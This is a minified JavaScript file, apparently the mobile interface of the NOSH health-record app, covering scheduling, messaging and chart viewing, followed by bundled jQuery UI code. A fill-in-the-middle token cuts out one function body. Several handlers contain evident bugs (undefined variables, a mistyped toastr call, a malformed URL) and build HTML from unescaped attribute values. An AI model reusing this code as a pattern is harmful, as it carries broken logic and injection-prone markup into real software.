parseInt($(this).attr('data-nosh-scroll')); $.mobile.silentScroll(scroll-70); } else { $.ajax({ type: "POST", url: origin, success: function(data){ $("#content_inner").html(data).trigger('create'); $("#edit_content").hide(); $("#navigation_header").hide(); $("#content").show(); $("#chart_header").show(); $.mobile.loading("hide"); } }); } }); $(document).on('click', '.cancel_edit', function(e) { $.mobile.loading("show"); var origin = $(this).attr('data-nosh-origin'); $.ajax({ type: "POST", url: origin, success: function(data){ $("#content_inner").html(data).trigger('create'); $("#edit_content").hide(); $("#navigation_header").hide(); $("#content").show(); 
$("#chart_header").show(); $.mobile.loading("hide"); } }); }); $(document).on('click', '.cancel_edit2', function(e) { var form = $(this).attr('data-nosh-form'); $("#"+form).clearForm(); $("#edit_content").hide(); $("#content").show(); }); $(document).on('click', '.nosh_schedule_event', function(e) { var editable = $(this).attr('data-nosh-editable'); if (editable != "false") { var id = $(this).attr('id'); if (id == 'patient_appt_button') { loadappt(); var startday = $(this).attr('data-nosh-start'); $('#start_date').val(startday); $("#edit_content").show(); $("#content").hide(); $("#title").focus(); $.mobile.silentScroll(0); return false; } if (id == 'event_appt_button') { loadevent(); var startday = $(this).attr('data-nosh-start'); $('#start_date').val(startday); $("#edit_content").show(); $("#content").hide(); $("#title").focus(); $.mobile.silentScroll(0); return false; } var form = {}; $.each($(this).get(0).attributes, function(i, attr) { if (attr.name.indexOf("data-nosh-") == '0') { var field = attr.name.replace('data-nosh-',''); field = field.replace('-', '_'); if (field == 'visit_type') { form.visit_type = attr.value; } if (field == 'title') { form.title = attr.value; } if (attr.value != 'undefined') { if (field != 'timestamp') { var value = attr.value; if (field.indexOf('_date') > 0) { value = moment(new Date(value)).format('YYYY-MM-DD'); } if (field == 'pid') { field = 'schedule_pid'; } if (field == 'title') { field = 'schedule_title'; } $('#' + field).val(value); } } } }); var timestamp = $(this).attr('data-nosh-timestamp'); $("#event_id_span").text(form.event_id); $("#pid_span").text(form.pid); $("#timestamp_span").text(timestamp); if (form.visit_type){ loadappt(); $("#patient_search").val(form.title); $("#end").val(''); } else { loadevent(); } var repeat_select = $("#repeat").val(); if (repeat_select != ''){ $("#until_row").show(); } else { $("#until_row").hide(); $("#until").val(''); } $("#delete_form").show(); $("#schedule_form select").selectmenu('refresh'); $("#edit_content").show(); $("#content").hide(); $("#title").focus(); $.mobile.silentScroll(0); return false; } else { toastr.error('You cannot edit this entry!'); return false; } }); $(document).on('click', '.nosh_messaging_item', function(e) { var form = {}; var datastring = ''; var label = $(this).html(); label = label.replace('<h3>','<h3 class="card-primary-title">'); label = label.replace('<p>','<h5 class="card-subtitle">'); label = label.replace('</p>','</h5>'); var origin = $(this).attr('data-origin'); var id = $(this).attr('data-nosh-message-id'); $.each($(this).get(0).attributes, function(i, attr) { if (attr.name.indexOf("data-nosh-") == '0') { datastring += attr.name + '="' + attr.value + '" '; var field = attr.name.replace('data-nosh-',''); if (field == 'message-from-label') { form.displayname = attr.value; } if (field == 'date') { form.date = attr.value; } if (field == 'subject') { form.subject = attr.value; } if (field == 'body') { form.body = attr.value; } if (field == 'bodytext') { form.bodytext = attr.value; } } }); var text = '<br><strong>From:</strong> ' + form.displayname + '<br><br><strong>Date:</strong> ' + form.date + '<br><br><strong>Subject:</strong> ' + form.subject + '<br><br><strong>Message:</strong> ' + form.bodytext; var action = '<div class="card-action">'; action += '<div class="row between-xs">'; action += '<div class="col-xs-4">'; action += '<div class="box">'; action += '<a href="#" class="ui-btn ui-btn-inline ui-btn-fab back_message" data-origin="' + origin + '" data-origin-id="' + id + 
'"><i class="zmdi zmdi-arrow-left"></i></a>'; action += '</div>'; action += '</div>'; if (origin == 'internal_inbox') { action += '<div class="col-xs-8 align-right">'; action += '<div class="box">'; action += '<a href="#" class="ui-btn ui-btn-inline ui-btn-fab reply_message"' + datastring + '><i class="zmdi zmdi-mail-reply"></i></a>'; action += '<a href="#" class="ui-btn ui-btn-inline ui-btn-fab reply_all_message"' + datastring + '><i class="zmdi zmdi-mail-reply-all"></i></a>'; action += '<a href="#" class="ui-btn ui-btn-inline ui-btn-fab forward_message"' + datastring + '><i class="zmdi zmdi-forward"></i></a>'; action += '<a href="#" class="ui-btn ui-btn-inline ui-btn-fab export_message"' + datastring + '><i class="zmdi zmdi-sign-in"></i></a>'; action += '</div>'; action += '</div>'; } action += '</div>'; action += '</div>'; var html = '<div class="nd2-card">'; html += '<div class="card-title">' + label + '</div>' + action; html += '<div class="card-supporting-text">' + text + '</div>' + action; html += '</div>'; $("#message_view1").html(html);
//$("#message_view_rawtext").val(rawtext);
//$("#message_view_message_id").val(id);
//$("#message_view_from").val(row['message_from']);
//$("#message_view_to").val(row['message_to']);
//$("#message_view_cc").val(row['cc']);
//$("#message_view_subject").val(row['subject']);
//$("#message_view_body").val(row['body']);
//$("#message_view_date").val(row['date']);
//$("#message_view_pid").val(row['pid']);
//$("#message_view_patient_name").val(row['patient_name']);
//$("#message_view_t_messages_id").val(row['t_messages_id']);
//$("#message_view_documents_id").val(row['documents_id']);
//messages_tags();
//if (row['pid'] == '' || row['pid'] == "0") {
//$("#export_message").hide();
//} else {
//$("#export_message").show();
//}
//$("#internal_messages_view_dialog").dialog('open');
//setTimeout(function() {
//var a = $("#internal_messages_view_dialog" ).dialog("isOpen");
//if (a) {
//var id = $("#message_view_message_id").val();
//var documents_id = $("#message_view_documents_id").val();
//if (documents_id == '') {
//documents_id = '0';
//}
//$.ajax({
//type: "POST",
//url: "ajaxmessaging/read-message/" + id + "/" + documents_id,
//success: function(data){
//$.jGrowl(data);
//reload_grid("internal_inbox");
//}
//});
//}
//}, 3000);
//form.event_id = $(this).attr('data-nosh-event-id');
//form.pid = $(this).attr('data-nosh-pid');
//form.start_date = moment(new Date($(this).attr('data-nosh-start-date'))).format('YYYY-MM-DD');
//form.start_time = $(this).attr('data-nosh-start-time');
//form.end = $(this).attr('data-nosh-end-time');
//form.visit_type = $(this).attr('data-nosh-visit-type');
//form.title = $(this).attr('data-nosh-title');
//form.repeat = $(this).attr('data-nosh-repeat');
//form.reason = $(this).attr('data-nosh-reason');
//form.until = $(this).attr('data-nosh-until');
//form.notes = $(this).attr('data-nosh-notes');
//form.status = $(this).attr('data-nosh-status');
//$.each(form, function(key, value){
//if (value != 'undefined') {
//$('#'+key).val(value);
//}
//});
//var timestamp = $(this).attr('data-nosh-timestamp');
//$("#event_id_span").text(form.event_id);
//$("#pid_span").text(form.pid);
//$("#timestamp_span").text(timestamp);
//if (form.visit_type){
//loadappt();
//$("#patient_search").val(form.title);
//$("#end").val('');
//} else {
//loadevent();
//}
//var repeat_select = $("#repeat").val();
//if (repeat_select != ''){
//$("#until_row").show();
//} else {
//$("#until_row").hide();
//$("#until").val('');
//}
//$("#delete_form").show();
//$("#schedule_form select").selectmenu('refresh'); $("#view_content").show(); $("#content").hide(); $("#edit_content").hide(); $('html, body').animate({ scrollTop: $("#view_content").offset().top }); return false; }); $(document).on('click', '.mobile_form_action', function(e) { var form_id = $(this).attr('data-nosh-form'); var table = $(this).attr('data-nosh-table'); var row_id = $(this).attr('data-nosh-id'); var action = $(this).attr('data-nosh-action'); var refresh_url = $(this).attr('data-nosh-origin'); var row_index = $(this).attr('data-nosh-index'); var bValid = true; $("#"+form_id).find("[required]").each(function() { var input_id = $(this).attr('id'); var id1 = $("#" + input_id); var text = $("label[for='" + input_id + "']").html(); bValid = bValid && checkEmpty(id1, text); }); if (bValid) { var str = $("#"+form_id).serialize(); $.ajax({ type: "POST", url: "../ajaxcommon/mobile-form-action/" + table + '/' + action + '/' + row_id + '/' + row_index, data: str, dataType: 'json', success: function(data){ if (data.response == 'OK') { $('#'+form_id).clearForm(); $.mobile.loading("show"); toastr.success(data.message); $.ajax({ type: "POST", url: refresh_url, success: function(data1){ $("#content_inner").html(data1).trigger('create'); $("#edit_content").hide(); $("#navigation_header").hide(); $("#content").show(); $("#chart_header").show(); $.mobile.loading("hide"); } }); } else { // error handling } } }); } }); $(document).on('click', '.mobile_form_action2', function(e) { var form_id = $(this).attr('data-nosh-form'); var action = $(this).attr('data-nosh-action'); var refresh_url = $(this).attr('data-nosh-origin'); if (refresh_url == 'mobile_schedule') { var start_date = $("#start_date").val(); var end = $("#end").val(); var visit_type = $("#visit_type").val(); var pid = $("#pid").val(); if (pid == '') { var reason = $("#reason").val(); $("#title").val(reason); } if ($("#repeat").val() != '' && $("#event_id").val() != '' && $("#event_id").val().indexOf("R") === -1) { var event_id = $("#event_id").val(); $("#event_id").val("N" + event_id); } if ($("#repeat").val() == '' && $("#event_id").val() != '' && $("#event_id").val().indexOf("R") !== -1) { var event_id1 = $("#event_id").val(); $("#event_id").val("N" + event_id1); } var str = $("#"+form_id).serialize(); if (visit_type == '' || visit_type == null && end == '') { toastr.error("No visit type or end time selected!"); } else { $.mobile.loading("show"); $.ajax({ type: "POST", url: "ajaxschedule/edit-event", data: str, success: function(data){ open_schedule(start_date); $("#"+form_id).clearForm(); $("#edit_content").hide(); $("#content").show(); $.mobile.loading("hide"); } }); } } if (refresh_url == 'mobile_inbox') { if (action == 'save') { var bValid = true; $("#"+form_id).find("[required]").each(function() { var input_id = $(this).attr('id'); var id1 = $("#" + input_id); var text = $("label[for='" + input_id + "']").html(); bValid = bValid && checkEmpty(id1, text); }); if (bValid) { $.mobile.loading("show"); var str = $("#"+form_id).serialize(); $.ajax({ type: "POST", url: "ajaxmessaging/send-message", data: str, success: function(data){ toastr.success(data); $("#"+form_id).clearForm(); $("#edit_content").hide(); $("#content").show(); $.mobile.loading("hide"); } }); } } if (action == 'draft') { var str = $("#"+form_id).serialize(); $.ajax({ type: "POST", url: "ajaxmessaging/draft-message", data: str, success: function(data){ toastr.success(data); $("#"+form_id).clearForm(); $("#edit_content").hide(); $("#content").show(); 
$.mobile.loading("hide"); } }); } } // more stuff $("#edit_content").hide(); $("#content").show(); }); $(document).on("click", ".mobile_paste", function(e) { var value = $(this).attr('data-nosh-value'); var to = $(this).attr('data-nosh-paste-to'); $('#'+to).val(value); $('input[data-type="search"]').val(""); $('input[data-type="search"]').trigger("keyup"); }); $(document).on("click", ".mobile_paste1", function(e) { var form = {}; form.rxl_medication = $(this).attr('data-nosh-med'); form.rxl_dosage = $(this).attr('data-nosh-value'); form.rxl_dosage_unit = $(this).attr('data-nosh-unit'); form.rxl_ndcid = $(this).attr('data-nosh-ndc'); $.each(form, function(key, value){ if (value != 'undefined') { $('#'+key).val(value); } }); $('input[data-type="search"]').val(""); $('input[data-type="search"]').trigger("keyup"); }); $(document).on("click", ".mobile_paste2", function(e) { var value = $(this).attr('data-nosh-value'); var to = $("#form_item").val(); $('#'+to).val(value); if (to == 'patient_search') { var id = $(this).attr('data-nosh-id'); $("#schedule_pid").val(id); $("#schedule_title").val(value); } $("#right_panel").panel('close'); $("#"+to).focus(); }); $(document).on("click", ".mobile_paste3", function(e) { var form = {}; form.sup_supplement = $(this).attr('data-nosh-value'); form.sup_dosage = $(this).attr('data-nosh-dosage'); form.sup_dosage_unit = $(this).attr('data-nosh-dosage-unit'); form.supplement_id = $(this).attr('data-nosh-supplement-id'); $.each(form, function(key, value){ if (value != 'undefined') { $('#'+key).val(value); } }); $('input[data-type="search"]').val(""); $('input[data-type="search"]').trigger("keyup"); }); $(document).on("click", ".mobile_paste4", function(e) { var value = $(this).attr('data-nosh-value'); var to = $(this).attr('data-nosh-paste-to'); var cvx = $(this).attr('data-nosh-cvx'); $('#'+to).val(value); $('#imm_cvxcode').val(cvx); $('input[data-type="search"]').val(""); $('input[data-type="search"]').trigger("keyup"); }); $(document).on("click", ".return_button", function(e) { $("#right_panel").panel('close'); }); $(document).on("click", "input", function(e) { if ($(this).hasClass('texthelper')) { var id = $(this).attr('id'); $("#form_item").val(id); $("#navigation_header_fav").show(); } else { $("#navigation_header_fav").hide(); } }); $(document).on('keydown', '.texthelper', function(e){ var value = $(this).val(); var input = $(this).attr('id'); if (value && value.length > 1) { $("#form_item").val(input); var $ul = $("#search_results"); var html = ""; var parts = input.split('_'); if (parts[0] == 'rxl') { var url = "../ajaxsearch/rx-search/" + input + "/true"; } if (parts[0] == 'sup') { var url = "../ajaxsearch/sup-"+ parts[1]; } if (parts[0] == 'allergies') { var url = "../ajaxsearch/reaction/true"; } $.mobile.loading("show"); $.ajax({ url: url, dataType: "json", type: "POST", data: "term=" + value }) .then(function(response) { if (response.response == 'true') { $.each(response.message, function ( i, val ) { if (val.value != null) { html += '<li><a href=# class="ui-btn ui-btn-icon-left ui-icon-carat-l mobile_paste2" data-nosh-value="' + val.value +'">' + val.label + '</a></li>'; } }); $ul.html(html); $ul.listview("refresh"); $ul.trigger("updatelayout"); $.mobile.loading("hide"); $("#right_panel").panel('open'); } else { $.mobile.loading("hide"); } }); } }); $(document).on('keydown', '.texthelper1', function(e){ var value = $(this).val(); var input = $(this).attr('id'); if (value && value.length > 2) { $.mobile.loading("show"); $("#form_item").val(input); 
var $ul = $("#search_results"); var html = ""; $.ajax({ url: "ajaxsearch/search", dataType: "json", type: "POST", data: "term=" + value }) .then(function(response) { if (response.response == 'true') { $.each(response.message, function ( i, val ) { if (val.value != null) { html += '<li><a href=# class="ui-btn ui-btn-icon-left ui-icon-carat-l mobile_paste2" data-nosh-value="' + val.value +'" data-nosh-id="' + val.id + '">' + val.label + '</a></li>'; } }); $ul.html(html); $("#right_panel").width("500px"); $ul.listview("refresh"); $ul.trigger("updatelayout"); $.mobile.loading("hide"); $("#right_panel").panel('open'); } else { $.mobile.loading("hide"); } }); } }); $(document).on("click", "#nosh_fab", function(e) { $(".nosh_fab_child").toggle('fade'); return false; }); $(document).on("click", "#nosh_fab1", function(e) { $("#view_content").hide(); $("#content").hide(); $("#edit_content").show(); return false; }); $(document).on("change", "#provider_list2", function(e) { var id = $('#provider_list2').val(); if(id){ $.ajax({ type: "POST", url: "ajaxschedule/set-provider", data: "id=" + id, success: function(data){ $("#visit_type").removeOption(/./); $.ajax({ url: "ajaxsearch/visit-types/" + id, dataType: "json", type: "POST", async: false, success: function(data){ if (data.response == 'true') { $("#visit_type").addOption(data.message, false); } else { $("#visit_type").addOption({"":"No visit types available."},false); } } }); } }); } }); $(document).on("click", ".cd-read-more", function(e) { $.mobile.loading("show"); var type = $(this).attr('data-nosh-type'); var value = $(this).attr('data-nosh-value'); var status = $(this).attr('data-nosh-status'); var scroll = $(this).closest('.cd-timeline-block').offset().top; var acl = false; if (noshdata.group_id == '2' || noshdata.group_id == '3') { acl = true; } if (type == 'eid') { if (status == 'Yes') { if (acl) { $("#content_inner_main").hide(); $.ajax({ type: "GET", url: "../ajaxchart/modal-view-mobile/" + value, success: function(data){ $("#content_inner").html(data).trigger('create').show(); $('#content_inner').find('h4').css('color','blue'); $("#navigation_header_back").attr('data-nosh-origin', 'Chart'); $("#navigation_header_back").attr('data-nosh-scroll', scroll); $("#chart_header").hide(); $("#navigation_header").show(); $("#left_panel").panel('close'); $.mobile.loading("hide"); } }); } else { $("#content_inner_main").hide(); $.ajax({ type: "POST", url: "../ajaxcommon/opennotes", success: function(data){ if (data == 'y') { $.ajax({ type: "GET", url: "../ajaxcommon/modal-view2-mobile/" + value, success: function(data){ $("#content_inner").html(data).trigger('create').show(); $('#content_inner').find('h4').css('color','blue'); $("#navigation_header_back").attr('data-nosh-origin', 'Chart'); $("#navigation_header_back").attr('data-nosh-scroll', scroll); $("#chart_header").hide(); $("#navigation_header").show(); $("#left_panel").panel('close'); $.mobile.loading("hide"); } }); } else { $toastr.error('You cannot view the encounter as your provider has not activated OpenNotes.'); $.mobile.loading("hide"); return false; } } }); } } else { toastr.error('Encounter is not signed. 
You cannot view it at this time.'); $.mobile.loading("hide"); return false; } } else if (type == 't_messages_id') { if (status == 'Yes') { if (acl) { $("#content_inner_main").hide(); $.ajax({ type: "GET", url: "../ajaxcommon/tmessages-view/" + value, success: function(data){ $("#content_inner").html(data).trigger('create').show(); $('#content_inner').find('strong').css('color','blue'); $("#navigation_header_back").attr('data-nosh-origin', 'Chart'); $("#navigation_header_back").attr('data-nosh-scroll', scroll); $("#chart_header").hide(); $("#navigation_header").show(); $("#left_panel").panel('close'); $.mobile.loading("hide"); } }); //$("#message_view").load('ajaxcommon/tmessages-view/' + value); //$("#t_messages_id").val(value); //t_messages_tags(); //$("#messages_view_dialog").dialog('open'); } else { $("#content_inner_main").hide(); $.ajax({ type: "POST", url: "../ajaxcommon/opennotes", success: function(data){ if (data == 'y') { $.ajax({ type: "GET", url: "../ajaxcommon/tmessages-view/" + value, success: function(data){ $("#content_inner").html(data).trigger('create').show(); $('#content_inner').find('strong').css('color','blue'); $("#navigation_header_back").attr('data-nosh-origin', 'Chart'); $("#navigation_header_back").attr('data-nosh-scroll', scroll); $("#chart_header").hide(); $("#navigation_header").show(); $("#left_panel").panel('close'); $.mobile.loading("hide"); } }); //$("#t_messages_id").val(value); //$("#messages_view_dialog").dialog('open'); } else { toastr.error('You cannot view the message as your provider has not activated OpenNotes.'); $.mobile.loading("hide"); return false; } } }); } } else { toastr.error('Message is not signed. You cannot view it at this time.'); $.mobile.loading("hide"); return false; } } }); $(document).on("click", ".messaging_tab", function(e) { var tab = $(this).attr('data-tab'); open_messaging(tab); $("#edit_content").hide(); $("#content").show(); }); $(document).on("click", ".back_message", function(e) { var tab = $(this).attr('data-origin'); var id = $(this).attr('data-origin-id'); open_messaging(tab); $("#view_content").hide(); $("#edit_content").hide(); $("#content").show(); var scroll = parseInt($('.nosh_messaging_item[data-nosh-message-id="' + id + '"]').offset().top); $.mobile.silentScroll(scroll-70); }); $(document).on("click", ".reply_message", function(e) { var form = {}; $.each($(this).get(0).attributes, function(i, attr) { if (attr.name.indexOf("data-nosh-") == '0') { var field = attr.name.replace('data-nosh-',''); field = field.replace(/-/g, '_'); form[field] = attr.value; if (attr.value != 'undefined') { if (attr.value != 'null') { if (field != 'timestamp') { var value = attr.value; if (field == 'date') { value = moment(new Date(value)).format('YYYY-MM-DD'); } $('input[name="' + field + '"]').val(value); } } } } }); $.ajax({ type: "POST", url: "ajaxmessaging/get-displayname", data: "id=" + form['message_from'], success: function(data){ $('select[name="messages_to[]"]').val(data); $('select[name="messages_to[]"]').selectmenu('refresh'); var subject = 'Re: ' + form['subject']; $('input[name="subject"]').val(subject); var newbody = '\n\n' + 'On ' + form['date'] + ', ' + data + ' wrote:\n---------------------------------\n' + form['body']; $('textarea[name="body"]').val(newbody).caret(0); $('textarea[name="body"]').focus(); $("#view_content").hide(); $("#content").hide(); $("#edit_content").show(); } }); }); $(document).on("click", ".reply_all_message", function(e) { var form = {}; $.each($(this).get(0).attributes, function(i, attr) { 
if (attr.name.indexOf("data-nosh-") == '0') { var field = attr.name.replace('data-nosh-',''); field = field.replace(/-/g, '_'); form[field] = attr.value; if (attr.value != 'undefined') { if (attr.value != 'null') { if (field != 'timestamp') { var value = attr.value; if (field == 'date') { value = moment(new Date(value)).format('YYYY-MM-DD'); } $('input[name="' + field + '"]').val(value); } } } } }); if (form['cc'] == ''){ $.ajax({ type: "POST", url: "ajaxmessaging/get-displayname", data: "id=" + form['message_from'], success: function(data){ $('select[name="messages_to[]"]').val(data); $('select[name="messages_to[]"]').selectmenu('refresh'); var subject = 'Re: ' + form['subject']; $('input[name="subject"]').val(subject); var newbody = '\n\n' + 'On ' + form['date'] + ', ' + data + ' wrote:\n---------------------------------\n' + form['body']; $('textarea[name="body"]').val(newbody).caret(0); $('textarea[name="body"]').focus(); $("#view_content").hide(); $("#content").hide(); $("#edit_content").show(); } }); } else { var to1 = to + ';' + cc; $.ajax({ type: "POST", url: ".ajaxmessaging/get-displayname1", data: "id=" + form['message_from'] + ';' + form['cc'], success: function(data){ var a_array = String(data).split(";"); $('select[name="messages_to[]"]').val(a_array); $('select[name="messages_to[]"]').selectmenu('refresh'); //var a_length = a_array.length; //for (var i = 0; i < a_length; i++) { //$('select[name="messages_to[]"]').selectOptions(a_array[i]); //} var subject = 'Re: ' + form['subject']; $('input[name="subject"]').val(subject); var newbody = '\n\n' + 'On ' + form['date'] + ', ' + data + ' wrote:\n---------------------------------\n' + form['body']; $('textarea[name="body"]').val(newbody).caret(0); $('textarea[name="body"]').focus(); $("#view_content").hide(); $("#content").hide(); $("#edit_content").show(); } }); } }); $(document).on("click", ".forward_message", function(e) { var form = {}; $.each($(this).get(0).attributes, function(i, attr) { if (attr.name.indexOf("data-nosh-") == '0') { var field = attr.name.replace('data-nosh-',''); field = field.replace(/-/g, '_'); form[field] = attr.value; if (attr.value != 'undefined') { if (attr.value != 'null') { if (field != 'timestamp') { var value = attr.value; if (field == 'date') { value = moment(new Date(value)).format('YYYY-MM-DD'); } $('input[name="' + field + '"]').val(value); } } } } }); var rawtext = 'From: ' + form['message_from_label'] + '\nDate: ' + form['date'] + '\nSubject: ' + form['subject'] + '\n\nMessage: ' + form['body']; var subject = 'Fwd: ' + form['subject']; $('input[name="subject"]').val(subject); var newbody = '\n\n' + 'On ' + form['date'] + ', ' + data + ' wrote:\n---------------------------------\n' + form['body']; $('input[name="body"]').val(newbody).caret(0); $('input[name="messages_to"]').focus(); $("#view_content").hide(); $("#content").hide(); $("#edit_content").show(); }); $(document).on("click", ".template_click", function(e) { $.mobile.loading("show"); //var id = $(this).prev().attr('id'); //console.log(id); var id = 'hpi'; $.mobile.loading("show"); $.ajax({ url: "ajaxsearch/textdump-group/" + id, type: "POST" }) .then(function(response) { $("#textdump_group_html").html(''); $("#textdump_group_html").append(response); $("#textdump_group_html").children().css({"padding":"6px"}); $("#textdump_group_html").children().not(':last-child').css({"border-width":"2px","border-bottom":"2px black solid"}); $(".edittextgroup").html('<i class="zmdi zmdi-edit"></i>').addClass('ui-btn ui-btn-inline'); 
$(".deletetextgroup").html('<i class="zmdi zmdi-delete"></i>').addClass('ui-btn ui-btn-inline'); $(".normaltextgroup").each(function(){ $item = $(this); $nextdiv = $(this).parent().next(); $($item).next('label').html('ALL NORMAL').css('color','blue').andSelf().wrapAll('<fieldset data-role="controlgroup" data-type="horizontal" data-mini="true"></fieldset>').parent().prependTo($nextdiv); }); $(".restricttextgroup").html('<i class="zmdi zmdi-close"></i>').addClass('ui-btn ui-btn-inline'); $("#textdump_group_target").val(id); $('#textdump_group_html_div').css('overflow-y', 'scroll'); $.mobile.loading("hide"); $("#textdump_group_html").trigger('create'); $('#textdump_group_html_div').popup('open'); }); }); $('#textdump_group_html_div').on({ popupbeforeposition: function() { var maxHeight = $(window).height() - 30; $('#textdump_group_html_div').css('max-height', maxHeight + 'px'); } }); $(document).on('click', '.textdump_group_item', function(){ $.mobile.loading("show"); var id = $("#textdump_group_target").val(); var group = $(this).text(); $("#textdump_group_item").val(group); var id1 = $(this).attr('id'); $("#textdump_group_id").val(id1); $.ajax({ type: "POST", url: "ajaxsearch/textdump/" + id, data: 'group='+group }) .then(function(response) { $("#textdump_html").html(''); $("#textdump_html").append(response); $("#textdump_html").children().css({"padding":"6px"}); $("#textdump_html").children().not(':last-child').css({"border-width":"2px","border-bottom":"2px black solid"}); $(".edittexttemplate").html('<i class="zmdi zmdi-edit"></i>').addClass('ui-btn ui-btn-inline'); $(".deletetexttemplate").html('<i class="zmdi zmdi-delete"></i>').addClass('ui-btn ui-btn-inline'); $(".normaltexttemplate").each(function(){ $item = $(this); $nextdiv = $(this).parent(); $($item).next('label').html('DEFAULT').css('color','blue').andSelf().wrapAll('<fieldset data-role="controlgroup" data-type="horizontal" data-mini="true"></fieldset>').parent().prependTo($nextdiv); }); // $(".normaltexttemplate").button({text: false, icons: {primary: "ui-icon-check"}}); // $('.textdump_item_text').editable('destroy'); // $('.textdump_item_text').editable({ // toggle:'manual', // ajaxOptions: { // headers: {"cache-control":"no-cache"}, // beforeSend: function(request) { // return request.setRequestHeader("X-CSRF-Token", $("meta[name='token']").attr('content')); // }, // error: function(xhr) { // if (xhr.status == "404" ) { // alert("Route not found!"); // //window.location.replace(noshdata.error); // } else { // if(xhr.responseText){ // var response1 = $.parseJSON(xhr.responseText); // var error = "Error:\nType: " + response1.error.type + "\nMessage: " + response1.error.message + "\nFile: " + response1.error.file; // alert(error); // } // } // } // } // }); $("#textdump_target").val(id); $('#textdump_html_div').css('overflow-y', 'scroll'); $.mobile.loading("hide"); $("#textdump_html").trigger('create'); $('#textdump_group_html_div').popup('close'); $('#textdump_html_div').popup('open'); }); }); $('#textdump_html_div').on({ popupbeforeposition: function() { var maxHeight = $(window).height() - 30; $('#textdump_html_div').css('max-height', maxHeight + 'px'); } }); /*! jQuery UI - v1.11.1 - 2014-09-10 * http://jqueryui.com * Includes: core.js, datepicker.js * Copyright 2014 jQuery Foundation and other contributors; Licensed MIT */ (function( factory ) { if ( typeof define === "function" && define.amd ) { // AMD. Register as an anonymous module. 
define([ "jquery" ], factory ); } else { // Browser globals factory( jQuery ); } }(function( $ ) { /*! * jQuery UI Core 1.11.1 * http://jqueryui.com * * Copyright 2014 jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license * * http://api.jqueryui.com/category/ui-core/ */ // $.ui might exist from components with no dependencies, e.g., $.ui.position $.ui = $.ui || {}; $.extend( $.ui, { version: "1.11.1", keyCode: { BACKSPACE: 8, COMMA: 188, DELETE: 46, DOWN: 40, END: 35, ENTER: 13, ESCAPE: 27, HOME: 36, LEFT: 37, PAGE_DOWN: 34, PAGE_UP: 33, PERIOD: 190, RIGHT: 39, SPACE: 32, TAB: 9, UP: 38 } }); // plugins $.fn.extend({ scrollParent: function( includeHidden ) { var position = this.css( "position" ), excludeStaticParent = position === "absolute", overflowRegex = includeHidden ? /(auto|scroll|hidden)/ : /(auto|scroll)/, scrollParent = this.parents().filter( function() { var parent = $( this ); if ( excludeStaticParent && parent.css( "position" ) === "static" ) { return false; } return overflowRegex.test( parent.css( "overflow" ) + parent.css( "overflow-y" ) + parent.css( "overflow-x" ) ); }).eq( 0 ); return position === "fixed" || !scrollParent.length ? $( this[ 0 ].ownerDocument || document ) : scrollParent; }, uniqueId: (function() { var uuid = 0; return function() { return this.each(function() { if ( !this.id ) { this.id = "ui-id-" + ( ++uuid ); } }); }; })(), removeUniqueId: function() { return this.each(function() { if ( /^ui-id-\d+$/.test( this.id ) ) { $( this ).removeAttr( "id" ); } }); } }); // selectors function focusable( element, isTabIndexNotNaN ) { var map, mapName, img, nodeName = element.nodeName.toLowerCase(); if ( "area" === nodeName ) { map = element.parentNode; mapName = map.name; if ( !element.href || !mapName || map.nodeName.toLowerCase() !== "map" ) { return false; } img = $( "img[usemap='#" + mapName + "']" )[ 0 ]; return !!img && visible( img ); } return ( /input|select|textarea|button|object/.test( nodeName ) ? !element.disabled : "a" === nodeName ? element.href || isTabIndexNotNaN : isTabIndexNotNaN) && // the element and all of its ancestors must be visible visible( element ); } function visible( element ) { return $.expr.filters.visible( element ) && !$( element ).parents().addBack().filter(function() { return $.css( this, "visibility" ) === "hidden"; }).length; } $.extend( $.expr[ ":" ], { data: $.expr.createPseudo ? $.expr.createPseudo(function( dataName ) { return function( elem ) { return !!$.data( elem, dataName ); }; }) : // support: jQuery <1.8 function( elem, i, match ) { return !!$.data( elem, match[ 3 ] ); }, focusable: function( element ) { return focusable( element, !isNaN( $.attr( element, "tabindex" ) ) ); }, tabbable: function( element ) {<|fim▁hole|> } }); // support: jQuery <1.8 if ( !$( "<a>" ).outerWidth( 1 ).jquery ) { $.each( [ "Width", "Height" ], function( i, name ) { var side = name === "Width" ? 
[ "Left", "Right" ] : [ "Top", "Bottom" ], type = name.toLowerCase(), orig = { innerWidth: $.fn.innerWidth, innerHeight: $.fn.innerHeight, outerWidth: $.fn.outerWidth, outerHeight: $.fn.outerHeight }; function reduce( elem, size, border, margin ) { $.each( side, function() { size -= parseFloat( $.css( elem, "padding" + this ) ) || 0; if ( border ) { size -= parseFloat( $.css( elem, "border" + this + "Width" ) ) || 0; } if ( margin ) { size -= parseFloat( $.css( elem, "margin" + this ) ) || 0; } }); return size; } $.fn[ "inner" + name ] = function( size ) { if ( size === undefined ) { return orig[ "inner" + name ].call( this ); } return this.each(function() { $( this ).css( type, reduce( this, size ) + "px" ); }); }; $.fn[ "outer" + name] = function( size, margin ) { if ( typeof size !== "number" ) { return orig[ "outer" + name ].call( this, size ); } return this.each(function() { $( this).css( type, reduce( this, size, true, margin ) + "px" ); }); }; }); } // support: jQuery <1.8 if ( !$.fn.addBack ) { $.fn.addBack = function( selector ) { return this.add( selector == null ? this.prevObject : this.prevObject.filter( selector ) ); }; } // support: jQuery 1.6.1, 1.6.2 (http://bugs.jquery.com/ticket/9413) if ( $( "<a>" ).data( "a-b", "a" ).removeData( "a-b" ).data( "a-b" ) ) { $.fn.removeData = (function( removeData ) { return function( key ) { if ( arguments.length ) { return removeData.call( this, $.camelCase( key ) ); } else { return removeData.call( this ); } }; })( $.fn.removeData ); } // deprecated $.ui.ie = !!/msie [\w.]+/.exec( navigator.userAgent.toLowerCase() ); $.fn.extend({ focus: (function( orig ) { return function( delay, fn ) { return typeof delay === "number" ? this.each(function() { var elem = this; setTimeout(function() { $( elem ).focus(); if ( fn ) { fn.call( elem ); } }, delay ); }) : orig.apply( this, arguments ); }; })( $.fn.focus ), disableSelection: (function() { var eventType = "onselectstart" in document.createElement( "div" ) ? "selectstart" : "mousedown"; return function() { return this.bind( eventType + ".ui-disableSelection", function( event ) { event.preventDefault(); }); }; })(), enableSelection: function() { return this.unbind( ".ui-disableSelection" ); }, zIndex: function( zIndex ) { if ( zIndex !== undefined ) { return this.css( "zIndex", zIndex ); } if ( this.length ) { var elem = $( this[ 0 ] ), position, value; while ( elem.length && elem[ 0 ] !== document ) { // Ignore z-index if position is set to a value where z-index is ignored by the browser // This makes behavior of this function consistent across browsers // WebKit always returns auto if the element is positioned position = elem.css( "position" ); if ( position === "absolute" || position === "relative" || position === "fixed" 